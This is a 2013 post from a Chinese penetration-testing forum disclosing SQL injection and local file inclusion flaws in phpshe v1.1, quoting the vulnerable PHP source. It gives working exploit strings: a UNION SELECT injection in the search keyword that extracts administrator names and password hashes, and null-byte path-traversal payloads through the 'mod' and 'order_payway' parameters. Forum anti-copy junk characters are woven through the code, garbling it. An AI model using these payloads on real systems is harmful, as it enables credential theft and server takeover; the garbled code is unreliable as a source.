找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2249|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/9 n, t* j; ]$ P
/* Phpshe v1.1 Vulnerability( [* J# Q9 l% A# [7 L2 O+ N: M
/* ========================% S* E+ _) A' c
/* By: : Kn1f3# [' o5 F- O( B
/* E-Mail : 681796@qq.com
& H; |$ W" d" J+ s0 r! v/*******************************************************/1 c6 Z) R% d* G- i* l. y' P
0×00 整体大概参数传输
# d6 x0 s7 X& Y
7 {$ @, Z/ m$ K) y, O9 o1 T2 {
& I; S1 N, x: t; Z# y& T
, s" W+ y, q& s: ~% e0 \, {0 t//common.php/ N' c, N! L: k
if (get_magic_quotes_gpc()) {6 A1 o% z, i& v2 Z$ ^( b7 s- \' N
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
, ]1 G7 h9 q/ G2 s, b!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
6 D. z8 g/ Z- w/ h+ t# y}3 Z5 l& E8 _- X- i% L9 V
else {6 q2 w5 B- S; |/ r: p. G  n9 v
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
' v% J8 {4 Z5 O: }# s!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');. ^9 ?8 H5 k/ C' H* M! |" ~' _3 t7 A
}7 \) d) E. E+ ~/ h( T* o: V% g
session_start();
3 s0 q2 G- g$ i!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
7 {7 w* B$ A; V) \5 }# h4 D  ?!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
! h0 h& x9 a! U8 k5 k5 [
' v; ~" P6 `# c* [. f6 u0×01 包含漏洞4 J) \6 p; b* z, \" V
( a0 V! s  K' D" u7 Y( q
$ }# O' v- M( \" O' m; \0 ?
//首页文件
' R& w0 U( j/ P: F, y<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);+ }0 ^7 w  P  I- w/ y
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
: T2 x/ I; `, T: B6 epe_result();5 B, k2 s; w8 f' S0 J, |5 [$ @
?>0 x- k, t! M& z# d( \+ w
//common 文件 第15行开始
6 U" T0 r' \# j: R( M% z. ^url路由配置3 r3 k5 v% Q; i& n! l5 ~
$module = $mod = $act = 'index';( R' D9 G+ e5 j# A; K" K
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);6 X* ]2 J6 K* b1 V3 U" X  d) u
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);+ D( Q0 Q" e7 h
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);/ K" r) [4 o# {. ~
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
7 u9 ?4 \# `8 n, T5 N" M; W

& X8 k2 \& n1 A, O# `2 M

: K% u% l; r3 G$ O- u& W3 } 0×02 搜索注入2 F% z- g' W7 p' C, |
6 x; Z8 [! l+ P& }$ F
<code id="code2">

//product.php文件/ z# ?/ Z* N9 T3 s
case 'list':/ l! R2 e; v2 D, g( `
$category_id = intval($id);
* m: k; n. Z, ~. c: [* ~6 N$info = $db->pe_select('category', array('category_id'=>$category_id));
, G& s& F' C+ i  [1 m" b//搜索
- l/ e+ K* @7 j1 q1 Q" m$sqlwhere = " and `product_state` = 1";
) J' g8 m. u. k3 _$ p% @pe_lead('hook/category.hook.php');
3 ^2 D/ w  p8 P) J3 yif ($category_id) {
& U! e5 y2 r. _# k; o% _where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";( r- |0 I# C5 A. Y7 S' t
}1 M9 F( a7 Y$ d% e8 n
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
' w7 V- j4 {3 ]5 n0 M* {if ($_g_orderby) {
3 @5 r6 {& a; v& q1 P' ~$orderby = explode('_', $_g_orderby);+ X& x8 A+ J$ L# i# k
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
% o, _. C7 a: P! x2 r1 w6 g% n}$ \( D" w; N* y2 @# O* t
else {
! B8 c! m5 c* I. B9 `" H, e$sqlwhere .= " order by `product_id` desc";
) o; x. z7 ]/ a6 w$ J}$ y, q! e+ T6 Q: _7 c
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));6 o) J* D1 I7 y7 e
//热卖排行  i; v6 X. v% s9 S
$product_hotlist = product_hotlist();( T# n( X- i, a2 s) l
//当前路径
3 y$ G2 C8 `' O6 I7 ~3 r$nowpath = category_path($category_id);
6 V! F0 m7 p! f5 _% F  @5 W$seo = pe_seo($info['category_name']);9 g* n1 T, R1 |$ x
include(pe_tpl('product_list.html'));" `) X( P) f) X& B6 i$ n
//跟进selectall函数库+ I& X5 D8 H3 B" @
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())+ K5 O  K% ~7 y2 @& Y
{5 l4 E- Y3 _7 V: S8 O$ F
//处理条件语句! R( q. c% l8 ?6 _1 ^) \
$sqlwhere = $this->_dowhere($where);. n2 Z1 |8 ]: F8 z3 L* j
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
3 f( q- Y# o' u, D}
9 J  o5 D, d+ h; `, k//exp
, N+ l0 p# r4 E4 @5 P/ Nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
" v- F/ N7 Y6 l. n; z

</code>8 Q4 M$ {% C. A1 ^+ Z

0 T% d8 q3 A, @& z( \0×03 包含漏洞25 P( A8 ~3 E$ U4 {. v5 u! z

- x( R" a: [& ?! M+ R( S$ h$ o; C<code id="code3">

//order.php

case 'pay':

3 W6 G0 @/ a8 z! [+ x8 w6 a% I* ~  \
$order_id = pe_dbhold($_g_id);


% S% ]/ _6 q' H/ O  X6 p: D! k$cache_payway = cache::get('payway');


9 c4 `8 \6 _) J4 |/ uforeach($cache_payway as $k => $v) {

) s7 g+ B- G$ \9 g( q& Z% S) g
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

0 N. s0 X* M% \4 w% |
if ($k == 'bank') {


' s: y. K* S7 Z$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


2 U5 o7 A+ p) V+ s}

; K! }/ X+ i# y
}


$ v5 Y2 d0 o& s- u' j9 n$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


/ w# Y9 x. e! H0 a( @! I!$order['order_id'] && pe_error('订单号错误...');


: I% O  h# N1 }if (isset($_p_pesubmit)) {


+ A) m8 A2 o  Z- w5 T4 Vif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


6 z( P  [/ M" M$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

! R' j2 A& [- n# m/ b7 ^: I. z
foreach ($info_list as $v) {

* f* r! W5 k/ b! |$ z. D4 u7 |/ T
$order['order_name'] .= "{$v['product_name']};";
1 h* t% D; Q8 R$ R( {) `. [7 q4 J% F

- L, A) E5 B! d2 v/ O. F
}


, \1 w$ K9 X; L: Zecho '正在为您连接支付网站,请稍后...';

+ N/ l7 D4 c! \0 w. t
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


! L0 a2 [0 _; e2 r}//当一切准备好的时候就可以进行"鸡肋包含了"

; d0 l9 S' Z5 x5 ]2 T' U5 \) l
else {

* J% T* f) l6 B, n9 O  _
pe_error('支付错误...');


* G* h7 c: y! S- N& d; H6 g}


- k  P* f2 O) J" h. n}

4 c: `1 m/ A8 c5 w. o
$seo = pe_seo('选择支付方式');

- u% h6 E3 m' w/ n, t( f
include(pe_tpl('order_pay.html'));

, [  |5 ^) C1 V
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
$ T3 |3 p5 d8 ^( l+ d& A0 Nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表